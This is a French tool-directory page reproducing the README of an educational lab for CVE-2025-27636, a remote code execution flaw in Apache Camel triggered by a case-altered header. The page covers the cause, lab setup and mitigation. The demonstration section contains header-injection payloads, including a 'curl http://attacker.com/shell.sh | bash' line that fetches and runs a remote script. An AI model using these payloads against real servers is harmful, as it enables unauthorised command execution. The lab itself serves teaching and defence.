Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-27636-Practical-Lab — Laboratoire pratique pour reproduire CVE-2025-27636, une RCE critique dans Apache Camel via un contournement de filtre d'en-tête sensible à la casse. Démontre l'injection d'en-tête pour exécuter des commandes arbitraires via le point de terminaison exec. | Kitploit
Outils/GitHubGitHub/enochgitgamefied/cve-2025-27636-practical-lab
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubenochgitgamefied/cve-2025-27636-practical-lab

CVE-2025-27636-Practical-Lab

Laboratoire pratique pour reproduire CVE-2025-27636, une RCE critique dans Apache Camel via un contournement de filtre d'en-tête sensible à la casse. Démontre l'injection d'en-tête pour exécuter des commandes arbitraires via le point de terminaison exec.

Voir le dépôt
2il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🛡️ CVE-2025-27636 — Laboratoire d'exploitation pratique pour Apache Camel

🔍 Vue d'ensemble

CVE-2025-27636 est une vulnérabilité critique d'exécution de code à distance (RCE) dans Apache Camel, plus précisément dans le composant camel-exec. Elle provient d'un problème subtil mais dangereux :

La DefaultHeaderFilterStrategy effectue des vérifications sensibles à la casse sur les noms d'en-têtes, lesquelles peuvent être contournées en utilisant une casse alternative.

Cela signifie que les en-têtes internes de Camel—comme CamelExecCommandExecutable—qui devraient être bloqués peuvent passer à travers si leur casse est manipulée (par exemple, cAmeLexecCommandExecutable).

Lorsque cet en-tête atteint le point de terminaison exec:, un attaquant peut injecter des commandes arbitraires, conduisant à une compromission totale du système.


📌 Contexte technique

✅ DefaultHeaderFilterStrategy

La DefaultHeaderFilterStrategy d'Apache Camel est conçue pour protéger les en-têtes internes comme :

  • CamelHttp*
  • CamelFile*
  • CamelExecCommandExecutable ← 🚨 vulnérable si la casse contourne le filtre

🔍 Que signifie « Interne » ? Les en-têtes internes sont :

Préfixés par Camel*

Utilisés uniquement dans Camel pour contrôler le comportement (routage, traitement, points de terminaison)

Non destinés à être exposés à des systèmes externes comme HTTP, JMS, etc.

Cependant, avant le correctif, ce filtre comparait les noms d'en-têtes en respectant la casse, ce qui viole la spécification HTTP (où les en-têtes sont insensibles à la casse) et permet des contournements tels que :

root@kitploit:~
GET /systeminfo HTTP/1.1
Host: target-ip:8484
cAmeLexecCommandExecutable: /bin/bash -c "touch /tmp/pwned"

Cet en-tête serait transmis au composant exec:, qui exécute ensuite la charge utile.

🛠️ CamelExecCommandExecutable

Cet en-tête indique au composant camel-exec quelle commande exécuter. Il est puissant—et extrêmement dangereux—s'il est contrôlable par l'utilisateur, en particulier dans des environnements qui prennent en charge des commandes au niveau du système d'exploitation (par exemple, bash, cmd.exe, etc.).


🧪 Laboratoire pratique : Pinewood Server Diagnostic

Projet : Pinewood Server Diagnostic Auteur : @enochgitgamefied Objectif : Reproduire CVE-2025-27636 dans un laboratoire pratique et éducatif.


🔗 Dépôt GitHub

👉 https://github.com/enochgitgamefied/CVE-2025-27636-Pratctical-Lab


📁 Présentation du projet

  • Conçu avec Apache Camel 4.10.0

  • Routes :

    • /tasks → Liste les tâches à l'aide de exec:tasklist ou exec:ps
    • /systeminfo → Affiche les informations système (systeminfo ou uname -a)
    • /network → Affiche ipconfig ou ifconfig
  • Interface web servie sur / via Jetty embarqué

  • Vulnérable à l'injection d'en-têtes à casse modifiée si le filtrage n'est pas corrigé


⚙️ Pour commencer

root@kitploit:~
# Clone the repository
git clone https://github.com/enochgitgamefied/CVE-2025-27636-Pratctical-Lab.git
cd CVE-2025-27636-Pratctical-Lab

# Package the app
mvn clean package

# Run it
java -jar target/hello-camel-1.0-SNAPSHOT.jar

Puis ouvrez dans votre navigateur :

🖥️ http://<your-ip>:8484


🚨 Démonstration de la vulnérabilité

Comportement non corrigé :

Si vous envoyez un en-tête comme celui-ci (remarquez la casse) :

root@kitploit:~
cAmeLexecCommandExecutable: whoami

Le filtre ne le bloque pas et il est transmis au point de terminaison exec:. Vous pouvez démontrer :

  • whoami
  • uname -a
  • bash -c "curl http://attacker.com/shell.sh | bash" ← dangereux

🎥 Démo YouTube

Une démonstration complète est en préparation et sera bientôt mise en ligne. Elle passera en revue :

  • Configuration de l'application
  • Injection d'en-têtes
  • Exécution de commandes
  • Étapes de remédiation

Lien de la démo sur Youtube https://www.youtube.com/watch?v=z4Xf9LYXc9o&t=714s!


🛡️ Atténuation & correctif

  1. Mettez à niveau Apache Camel vers une version avec filtrage des en-têtes insensible à la casse (ceci est corrigé).
  2. Utilisez une HeaderFilterStrategy personnalisée si vous devez appliquer une logique plus stricte.
  3. N'exposez pas les routes exec: directement à HTTP sans un verrouillage complet.

🧠 Points clés à retenir

  • Les en-têtes internes ne doivent jamais être contrôlables par des utilisateurs externes.
  • Le respect de la casse dans les filtres de sécurité est un anti-pattern bien connu.
  • Apache Camel est puissant, mais ce pouvoir s'accompagne d'une responsabilité—en particulier lors du chaînage HTTP vers exec.

⚠️ Avertissement

Ce laboratoire est conçu uniquement à des fins éducatives et de laboratoire contrôlé. N'essayez jamais cela sur des systèmes ou des réseaux non autorisés.

Apache Camel2
Télécharger l’outil